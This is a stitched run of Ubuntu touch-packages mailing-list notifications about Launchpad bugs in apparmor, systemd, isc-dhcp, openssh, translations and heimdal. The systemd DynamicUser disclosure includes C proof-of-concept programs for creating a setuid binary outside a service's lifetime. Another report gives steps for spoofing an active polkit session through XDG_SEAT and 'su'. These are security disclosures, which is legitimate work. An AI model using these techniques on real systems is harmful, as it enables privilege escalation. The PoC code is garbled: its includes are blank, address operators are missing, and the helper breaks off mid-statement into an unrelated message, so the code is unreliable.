dpkg -S `which mv`
debsums -as $(dpkg -S $(which mv) | cut -d: -f1)

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1826429

Title:
  package apparmor 2.13.2-9ubuntu6 failed to install/upgrade: installed
  apparmor package post-installation script subprocess returned error
  exit status 1

Status in apparmor package in Ubuntu:
  New

Bug description:
  error when upgrading from ubuntu 18.10 to 19.04

  ProblemType: Package
  DistroRelease: Ubuntu 19.04
  Package: apparmor 2.13.2-9ubuntu6
  ProcVersionSignature: Error: [Errno 2] No such file or directory: 
'/proc/version_signature'
  Uname: Linux 4.20.0-042000-generic x86_64
  ApportVersion: 2.20.10-0ubuntu13.3
  Architecture: amd64
  Date: Thu Apr 25 23:17:05 2019
  ErrorMessage: installed apparmor package post-installation script subprocess 
returned error exit status 1
  ProcKernelCmdline: BOOT_IMAGE=/vmlinuz-4.20.0-042000-generic 
root=UUID=4b7cc41e-02a4-11e9-a2fe-94c6911d33aa ro
  Python3Details: /usr/bin/python3.7, Python 3.7.3, python3-minimal, 3.7.3-1
  PythonDetails: /usr/bin/python2.7, Python 2.7.16, python-minimal, 2.7.16-1
  RelatedPackageVersions:
   dpkg 1.19.6ubuntu1
   apt  1.8.0
  SourcePackage: apparmor
  Syslog:
   
  Title: package apparmor 2.13.2-9ubuntu6 failed to install/upgrade: installed 
apparmor package post-installation script subprocess returned error exit status 
1
  UpgradeStatus: Upgraded to disco on 2019-04-25 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1826429/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1814596] Re: DynamicUser can create setuid binaries when assisted by another process

[Seth Arnold]

Thanks Jann

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1814596

Title:
  DynamicUser can create setuid binaries when assisted by another
  process

Status in systemd package in Ubuntu:
  New

Bug description:
  [I am sending this bug report to Ubuntu as requested by systemd at
  
.]

  This bug report describes a bug in systemd that allows a service with
  DynamicUser in collaboration with another service or user to create a setuid
  binary that can be used to access its UID beyond the lifetime of the service.
  This bug probably has relatively low severity, given that there aren't many
  services yet that use DynamicUser, and the requirement of collaboration with
  another process limits the circumstances in which it would be useful to an
  attacker further; but in a system that makes heavy use of DynamicUser, it 
would
  probably have impact.

  

  says:

  In order to allow the service to write to certain directories, they have 
to
  be whitelisted using ReadWritePaths=, but care must be taken so that 
UID/GID
  recycling doesn't create security issues involving files created by the
  service.

  While I was chatting about DynamicUser with catern on IRC, I noticed that
  DynamicUser doesn't isolate the service from the rest of the system in terms 
of
  UNIX domain sockets; therefore, if a collaborating user passes a file 
descriptor
  to a world-writable path outside the service's mount namespace into the
  service, the service can then create setuid files that can be used by the
  collaborating user beyond the lifetime of the service.

  
  To reproduce:

  As a user:
  ==
  user@deb10:~$ mkdir systemd_uidleak
  user@deb10:~$ cd systemd_uidleak
  user@deb10:~/systemd_uidleak$ cat > breakout_assisted.c
  #define _GNU_SOURCE
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  int main(void) {
setbuf(stdout, NULL);

// prepare unix domain socket
int s = socket(AF_UNIX, SOCK_DGRAM, 0);
if (s < 0) err(1, "unable to create unix domain socket");
struct sockaddr_un addr = {
  .sun_family = AF_UNIX,
  .sun_path = "\0breakout"
};
if (bind(s, (struct sockaddr *), sizeof(sa_family_t)+1+8))
  err(1, "unable to bind abstract socket");
puts("waiting for connection from outside the service...");

// receive fd to somewhere under the real root
int len = sizeof(struct cmsghdr) + sizeof(int);
struct cmsghdr *hdr = alloca(len);
struct msghdr msg = {
  .msg_control = hdr,
  .msg_controllen = len
};
if (recvmsg(s, , 0) < 0) err(1, "unable to receive fd");
if (hdr->cmsg_len != len || hdr->cmsg_level != SOL_SOCKET
|| hdr->cmsg_type != SCM_RIGHTS)
  errx(1, "got bad message");
puts("got rootfd from other chroot...");
if (fchdir(*(int*)CMSG_DATA(hdr))) err(1, "unable to change into real 
root");
char curpath[4096];
if (!getcwd(curpath, sizeof(curpath))) err(1, "unable to getpath()");
printf("chdir successful, am now in %s\n", curpath);

// create suid file
int src_fd = open("suid_src", O_RDONLY);
if (src_fd == -1) err(1, "open suid_src");
int dst_fd = open("suid_dst", O_RDWR|O_CREAT|O_EXCL, 0644);
if (dst_fd == -1) err(1, "open suid_dst");

while (1) {
  char buf[1000];
  ssize_t res = read(src_fd, buf, sizeof(buf));
  if (res == -1) err(1, "read");
  if (res == 0) break;
  ssize_t res2 = write(dst_fd, buf, res);
  if (res2 != res) err(1, "write");
}

if (fchmod(dst_fd, 04755)) err(1, "fchmod");
close(src_fd);
close(dst_fd);

// and that's it!
puts("done!");
while (1) pause();
return 0;
  }
  user@deb10:~/systemd_uidleak$ gcc -o breakout_assisted breakout_assisted.c 
  user@deb10:~/systemd_uidleak$ cat > breakout_helper.c
  #define _GNU_SOURCE
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  int main(void) {
int rootfd = open(".", O_PATH);
if (rootfd < 0) err(1, "unable to open cwdfd");
int s = socket(AF_UNIX, SOCK_DGRAM, 0);
if (s < 0) err(1, "unable to create unix domain socket");
struct sockaddr_un addr = {
  .sun_family = AF_UNIX,
  .sun_path = "\0breakout"
};
if (connect(s, (struct sockaddr *), sizeof(sa_family_t)+1+8))
  err(1, "unable to connect to abstract socket");
puts("connected to other chroot, sending cwdfd...");

int len = sizeof(struct cmsghdr) + sizeof(int);
struct cmsghdr *hdr = alloca(len);
*hdr = 

[Touch-packages] [Bug 1824724] Re: aa-logprof: german translation: ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen

[Seth Arnold]

** Also affects: language-pack-de-base (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to language-pack-de in
Ubuntu.
https://bugs.launchpad.net/bugs/1824724

Title:
  aa-logprof: german translation: ERROR: PromptUser: Ungültiges
  Tastenkürzel für V: Änderungen ansehen

Status in AppArmor:
  New
Status in Ubuntu Translations:
  New
Status in language-pack-de package in Ubuntu:
  New
Status in language-pack-de-base package in Ubuntu:
  New

Bug description:
  after the last Erl(a)uben [Allow] theres an errormessage:
  "ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen"
  see here:

  Profil:  /usr/bin/snap
  Pfad:/sys/kernel/security/apparmor/features/policy/versions/v5
  Neuer Modus: r
  Schweregrad: 4

   [1 - /sys/kernel/security/apparmor/features/policy/versions/v5 r,]
  Erl(a)uben / [A(b)lehnen] / (I)gnorieren / (G)lob / Glob with (E)xtension / 
(N)eu / Audi(t) / Abb(r)echen / En(d)e
  /sys/kernel/security/apparmor/features/policy/versions/v5 r, wird zum Profil 
hinzugefügt.

  ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen
  [view changes]

  imho it's a translation error.

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1824724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1824724] Re: aa-logprof: german translation: ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen

[Seth Arnold]

Hello German translators, what's involved in fixing translations and
pushing an updated translation package to users? The new strings have
broken some AppArmor utilities.

I believe the lines that need fixing:

language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(V)iew Profile"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"V: Profil ansehen"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)se Profile"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Profil verwenden"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(C)reate New Profile"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"C: Neues Profil erstellen"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)pdate Profile"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Profil aktualisieren"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(I)gnore Update"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"I: Aktualisierung ignorieren"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)pload Changes"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Änderungen hochladen"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(V)iew Changes"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"V: Änderungen ansehen"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(V)iew Profile"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"V: Profil ansehen"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)se Profile"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Profil verwenden"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(C)reate New Profile"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"C: Neues Profil erstellen"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)pdate Profile"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Profil aktualisieren"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(I)gnore Update"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"I: Aktualisierung ignorieren"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)pload Changes"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Änderungen hochladen"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(V)iew Changes"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"V: Änderungen ansehen"

and

language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(V)iew Profile"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "V: Profil ansehen"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(U)se Profile"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "U: Profil verwenden"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(C)reate New Profile"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "C: Neues Profil erstellen"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(U)pdate Profile"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "U: Profil aktualisieren"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(I)gnore Update"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "I: Aktualisierung ignorieren"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(U)pload Changes"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "U: Änderungen hochladen"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(V)iew Changes"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "V: Änderungen ansehen"
--
language-pack-de-base_19.04+20190412/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(V)iew Profile"
language-pack-de-base_19.04+20190412/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "V: Profil ansehen"
--
language-pack-de-base_19.04+20190412/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(U)se Profile"
language-pack-de-base_19.04+20190412/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "U: Profil verwenden"
--

[Touch-packages] [Bug 1824724] Re: aa-logprof: german translation: ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen

[Seth Arnold]

** Also affects: ubuntu-translations
   Importance: Undecided
   Status: New

** Changed in: ubuntu-translations
 Assignee: (unassigned) => Ubuntu German Translators (ubuntu-l10n-de)

** Also affects: language-pack-de (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to language-pack-de in
Ubuntu.
https://bugs.launchpad.net/bugs/1824724

Title:
  aa-logprof: german translation: ERROR: PromptUser: Ungültiges
  Tastenkürzel für V: Änderungen ansehen

Status in AppArmor:
  New
Status in Ubuntu Translations:
  New
Status in language-pack-de package in Ubuntu:
  New

Bug description:
  after the last Erl(a)uben [Allow] theres an errormessage:
  "ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen"
  see here:

  Profil:  /usr/bin/snap
  Pfad:/sys/kernel/security/apparmor/features/policy/versions/v5
  Neuer Modus: r
  Schweregrad: 4

   [1 - /sys/kernel/security/apparmor/features/policy/versions/v5 r,]
  Erl(a)uben / [A(b)lehnen] / (I)gnorieren / (G)lob / Glob with (E)xtension / 
(N)eu / Audi(t) / Abb(r)echen / En(d)e
  /sys/kernel/security/apparmor/features/policy/versions/v5 r, wird zum Profil 
hinzugefügt.

  ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen
  [view changes]

  imho it's a translation error.

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1824724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1812316] Re: systemd: lack of seat verification in PAM module permits spoofing active session to polkit

[Seth Arnold]

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1812316

Title:
  systemd: lack of seat verification in PAM module permits spoofing
  active session to polkit

Status in systemd package in Ubuntu:
  New

Bug description:
  [I am sending this bug report to Ubuntu as requested by systemd at
  
.]

  As documented at
  , for
  any action, a polkit policy can specify separate levels of required
  authentication based on whether a client is:

   - in an active session on a local console
   - in an inactive session on a local console
   - or neither

  This is expressed in the policy using the elements "allow_any",
  "allow_inactive" and "allow_active". Very roughly speaking, the idea here is
  to give special privileges to processes owned by users that are sitting
  physically in front of the machine (or at least, a keyboard and a screen that
  are connected to a machine), and restrict processes that e.g. belong to users
  that are ssh'ing into a machine.

  For example, the ability to refresh the system's package index is restricted
  this way using a policy in
  /usr/share/polkit-1/actions/org.freedesktop.packagekit.policy:


  [...]
  Refresh system repositories
  [...]
  Authentication is required to refresh the system 
repositories
  [...]
  
auth_admin
auth_admin
yes
  


  
  On systems that use systemd-logind, polkit determines whether a session is
  associated with a local console by checking whether systemd-logind is tracking
  the session as being associated with a "seat". This happens through
  polkit_backend_session_monitor_is_session_local() in
  polkitbackendsessionmonitor-systemd.c, which calls sd_session_get_seat().
  The check whether a session is active works similarly.

  systemd-logind is informed about the creation of new sessions by the PAM
  module pam_systemd through a systemd message bus call from
  pam_sm_open_session() to method_create_session(). The RPC method trusts the
  information supplied to it, apart from some consistency checks; that is not
  directly a problem, since this RPC method can only be invoked by root.
  This means that the PAM module needs to ensure that it doesn't pass incorrect
  data to systemd-logind.

  Looking at the code in the PAM module, however, you can see that the seat name
  of the session and the virtual terminal number come from environment
  variables:

  seat = getenv_harder(handle, "XDG_SEAT", NULL);
  cvtnr = getenv_harder(handle, "XDG_VTNR", NULL);
  type = getenv_harder(handle, "XDG_SESSION_TYPE", type_pam);
  class = getenv_harder(handle, "XDG_SESSION_CLASS", class_pam);
  desktop = getenv_harder(handle, "XDG_SESSION_DESKTOP", desktop_pam);

  This is actually documented at
  
.

  After some fixup logic that is irrelevant here, this data is then passed to
  the RPC method.

  
  One quirk of this issue is that a new session is only created if the calling
  process is not already part of a session (based on the cgroups it is in,
  parsed from procfs). This means that an attacker can't simply ssh into a
  machine, set some environment variables, and then invoke a setuid binary that
  uses PAM (such as "su") because ssh already triggers creation of a session via
  PAM. But as it turns out, the systemd PAM module is only invoked for
  interactive sessions:

  # cat /usr/share/pam-configs/systemd
  Name: Register user sessions in the systemd control group hierarchy
  Default: yes
  Priority: 0
  Session-Interactive-Only: yes
  Session-Type: Additional
  Session:
  optional pam_systemd.so

  So, under the following assumptions:

   - we can run commands on the remote machine, e.g. via SSH
   - our account can be used with "su" (it has a password and isn't disabled)
   - the machine has no X server running and is currently displaying tty1, with
 a login prompt

  we can have our actions checked against the "allow_active" policies instead of
  the "allow_any" policies as follows:

   - SSH into the machine
   - use "at" to schedule a job in one minute that does the following:
 * wipe the environment
 * set XDG_SEAT=seat0 and XDG_VTNR=1
 * use "expect" to run "su -c {...} {our_username}" and enter our user's
   password
 * in the shell invoked by "su", perform the action we want to run under the
   "allow_active" policy

  
  I tested this in a Debian 10 VM, as follows ("{{{...}}}" have been replaced),
  after ensuring that no sessions are active and the VM's screen is showing the
  login prompt on 

Re: [Touch-packages] [Bug 1823985] Re: isc-dhcp-server can't load leases file with apparmor enabled

[Seth Arnold]

On Wed, Apr 10, 2019 at 08:34:47AM -, Lars wrote:
> [root@myhost:~]↥ 1 # namei -l /test/var/lib/dhcp/dhcpd.leases
> f: /test/var/lib/dhcp/dhcpd.leases
> drwxr-xr-x root  root  /
> drwxr-xr-x dhcpd dhcpd test
> drwxr-xr-x dhcpd dhcpd var
> drwxr-xr-x dhcpd dhcpd lib
> drwxr-xr-x dhcpd dhcpd dhcp
> -rw-r--r-- dhcpd dhcpd dhcpd.leases

Note that these permissions don't allow root to write to this file UNLESS
root uses the CAP_DAC_OVERRIDE permission is used.

Thanks.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu.
https://bugs.launchpad.net/bugs/1823985

Title:
  isc-dhcp-server can't load leases file with apparmor enabled

Status in isc-dhcp package in Ubuntu:
  New

Bug description:
  I can't start isc-dhcp-server with apparmor enabled.

  I set a custom leases file in the dhcpd.conf:
   lease-file-name "/test/var/lib/dhcp/dhcpd.leases";

  and created a custom apparmor profile for that in 
/etc/apparmor.d/local/usr.sbin.dhcpd:
  /test/var/lib/dhcp/dhcpd{,6}.leases* lrw,

  But when I try to start I see the following errors from dhcpd:

  Internet Systems Consortium DHCP Server 4.3.5
  Copyright 2004-2016 Internet Systems Consortium.
  All rights reserved.
  For info, please visit https://www.isc.org/software/dhcp/
  Config file: /etc/dhcp/dhcpd.conf
  Database file: /test/var/lib/dhcp/dhcpd.leases
  PID file: /run/dhcp-server/dhcpd.pid
  Can't open /test/var/lib/dhcp/dhcpd.leases for append.

  If you think you have received this message due to a bug rather
  than a configuration issue please read the section on submitting
  bugs on either our web page at www.isc.org or in the README file
  before submitting a bug.  These pages explain the proper
  process and the information we find helpful for debugging..

  exiting.

  
  And in the messages log I can see errors like this:

  Apr  9 17:07:03.601 myhost dhcpd[27361]: Can't open 
/test/var/lib/dhcp/dhcpd.leases for append.
  Apr  9 17:07:03.601 myhost dhcpd[27361]:
  Apr  9 17:07:03.601 myhost dhcpd[27361]: If you think you have received this 
message due to a bug rather
  Apr  9 17:07:03.601 myhost dhcpd[27361]: than a configuration issue please 
read the section on submitting
  Apr  9 17:07:03.601 myhost dhcpd[27361]: bugs on either our web page at 
www.isc.org or in the README file
  Apr  9 17:07:03.601 myhost dhcpd[27361]: before submitting a bug.  These 
pages explain the proper
  Apr  9 17:07:03.601 myhost dhcpd[27361]: process and the information we find 
helpful for debugging..
  Apr  9 17:07:03.601 myhost dhcpd[27361]:
  Apr  9 17:07:03.601 myhost dhcpd[27361]: exiting.
  Apr  9 17:07:03.603 myhost kernel: audit: type=1400 
audit(1554822423.596:221): apparmor="DENIED" operation="capable" 
profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  
capname="dac_override"
  Apr  9 17:07:03.603 myhost kernel: audit: type=1400 
audit(1554822423.596:221): apparmor="DENIED" operation="capable" 
profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  
capname="dac_override"



  After disabling apparmor for dhcpd everything works as expected:

  ln -s /etc/apparmor.d/usr.sbin.dhcpd /etc/apparmor.d/disable/
  apparmor_parser -R /etc/apparmor.d/usr.sbin.dhcpd

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1823985/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1823985] [NEW] isc-dhcp-server can't load leases file with apparmor enabled

[Seth Arnold]

On Tue, Apr 09, 2019 at 03:15:26PM -, Lars wrote:
> I set a custom leases file in the dhcpd.conf:
>  lease-file-name "/test/var/lib/dhcp/dhcpd.leases";
> 
> and created a custom apparmor profile for that in 
> /etc/apparmor.d/local/usr.sbin.dhcpd:
> /test/var/lib/dhcp/dhcpd{,6}.leases* lrw,
> 
> But when I try to start I see the following errors from dhcpd:

> Apr  9 17:07:03.603 myhost kernel: audit: type=1400 
> audit(1554822423.596:221): apparmor="DENIED" operation="capable" 
> profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  
> capname="dac_override"
> Apr  9 17:07:03.603 myhost kernel: audit: type=1400 
> audit(1554822423.596:221): apparmor="DENIED" operation="capable" 
> profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  
> capname="dac_override"

Hello Lars, this is indicating that the dhcpd service is trying to use
root's capability to bypass permissions to use this file. I suggest
checking the owner, group, and permissions of all directories and the
lease file. (namei -l /test/var/lib/dhcp/dhcpd.leases can be handy
for this.)

If all those owners and permissions are as you intended and you want the
dhcpd service to use root powers to access the file, then you'll also need
to modify the profile to allow the dhcpd daemon to use the dac_override:

  capability dac_override,

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu.
https://bugs.launchpad.net/bugs/1823985

Title:
  isc-dhcp-server can't load leases file with apparmor enabled

Status in isc-dhcp package in Ubuntu:
  New

Bug description:
  I can't start isc-dhcp-server with apparmor enabled.

  I set a custom leases file in the dhcpd.conf:
   lease-file-name "/test/var/lib/dhcp/dhcpd.leases";

  and created a custom apparmor profile for that in 
/etc/apparmor.d/local/usr.sbin.dhcpd:
  /test/var/lib/dhcp/dhcpd{,6}.leases* lrw,

  But when I try to start I see the following errors from dhcpd:

  Internet Systems Consortium DHCP Server 4.3.5
  Copyright 2004-2016 Internet Systems Consortium.
  All rights reserved.
  For info, please visit https://www.isc.org/software/dhcp/
  Config file: /etc/dhcp/dhcpd.conf
  Database file: /test/var/lib/dhcp/dhcpd.leases
  PID file: /run/dhcp-server/dhcpd.pid
  Can't open /test/var/lib/dhcp/dhcpd.leases for append.

  If you think you have received this message due to a bug rather
  than a configuration issue please read the section on submitting
  bugs on either our web page at www.isc.org or in the README file
  before submitting a bug.  These pages explain the proper
  process and the information we find helpful for debugging..

  exiting.

  
  And in the messages log I can see errors like this:

  Apr  9 17:07:03.601 myhost dhcpd[27361]: Can't open 
/test/var/lib/dhcp/dhcpd.leases for append.
  Apr  9 17:07:03.601 myhost dhcpd[27361]:
  Apr  9 17:07:03.601 myhost dhcpd[27361]: If you think you have received this 
message due to a bug rather
  Apr  9 17:07:03.601 myhost dhcpd[27361]: than a configuration issue please 
read the section on submitting
  Apr  9 17:07:03.601 myhost dhcpd[27361]: bugs on either our web page at 
www.isc.org or in the README file
  Apr  9 17:07:03.601 myhost dhcpd[27361]: before submitting a bug.  These 
pages explain the proper
  Apr  9 17:07:03.601 myhost dhcpd[27361]: process and the information we find 
helpful for debugging..
  Apr  9 17:07:03.601 myhost dhcpd[27361]:
  Apr  9 17:07:03.601 myhost dhcpd[27361]: exiting.
  Apr  9 17:07:03.603 myhost kernel: audit: type=1400 
audit(1554822423.596:221): apparmor="DENIED" operation="capable" 
profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  
capname="dac_override"
  Apr  9 17:07:03.603 myhost kernel: audit: type=1400 
audit(1554822423.596:221): apparmor="DENIED" operation="capable" 
profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  
capname="dac_override"



  After disabling apparmor for dhcpd everything works as expected:

  ln -s /etc/apparmor.d/usr.sbin.dhcpd /etc/apparmor.d/disable/
  apparmor_parser -R /etc/apparmor.d/usr.sbin.dhcpd

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1823985/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

[Seth Arnold]

Vital, just scanning version banners is what leads to this problem.
Inspecting the package database would be far more reliable.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629

Title:
  CVE-2018-15473 - User enumeration vulnerability

Status in openssh package in Ubuntu:
  Fix Released
Status in openssh source package in Trusty:
  Fix Released
Status in openssh source package in Xenial:
  Fix Released
Status in openssh source package in Bionic:
  Fix Released
Status in openssh source package in Cosmic:
  Fix Released

Bug description:
  https://nvd.nist.gov/vuln/detail/CVE-2018-15473

  OpenSSH through 7.7 is prone to a user enumeration vulnerability due
  to not delaying bailout for an invalid authenticating user until after
  the packet containing the request has been fully parsed, related to
  auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

  Fixed in Debian: https://www.debian.org/security/2018/dsa-4280

  Currently pending triage? https://people.canonical.com/~ubuntu-
  security/cve/2018/CVE-2018-15473.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1794629/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

[Seth Arnold]

Root, that script is suitable for timing attacks against ssh. This issue
is easier to use to enumerate users, but does require a different
approach. There was a tool posted to oss-security for this:
https://www.openwall.com/lists/oss-security/2018/08/16/1

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629

Title:
  CVE-2018-15473 - User enumeration vulnerability

Status in openssh package in Ubuntu:
  Fix Released
Status in openssh source package in Trusty:
  Fix Released
Status in openssh source package in Xenial:
  Fix Released
Status in openssh source package in Bionic:
  Fix Released
Status in openssh source package in Cosmic:
  Fix Released

Bug description:
  https://nvd.nist.gov/vuln/detail/CVE-2018-15473

  OpenSSH through 7.7 is prone to a user enumeration vulnerability due
  to not delaying bailout for an invalid authenticating user until after
  the packet containing the request has been fully parsed, related to
  auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

  Fixed in Debian: https://www.debian.org/security/2018/dsa-4280

  Currently pending triage? https://people.canonical.com/~ubuntu-
  security/cve/2018/CVE-2018-15473.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1794629/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1823422] Re: heimdal ftbfs in disco

[Seth Arnold]

Hmm, also ugly:

test-normalize.c: In function ‘main’:
test-normalize.c:159:49: warning: ‘__builtin___snprintf_chk’ output may be 
truncated before the last format character [-Wformat-truncation=]
  snprintf(longname, sizeof(longname), "%s/%s", srcdir, filename);
 ^
In file included from /usr/include/stdio.h:867,
 from test-normalize.c:37:
/usr/include/x86_64-linux-gnu/bits/stdio2.h:67:10: note: 
‘__builtin___snprintf_chk’ output 2 or more bytes (assuming 257) into a 
destination of size 256
   return __builtin___snprintf_chk (__s, __n, __USE_FORTIFY_LEVEL - 1,
  ^~~~
__bos (__s), __fmt, __va_arg_pack ());
~

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to heimdal in Ubuntu.
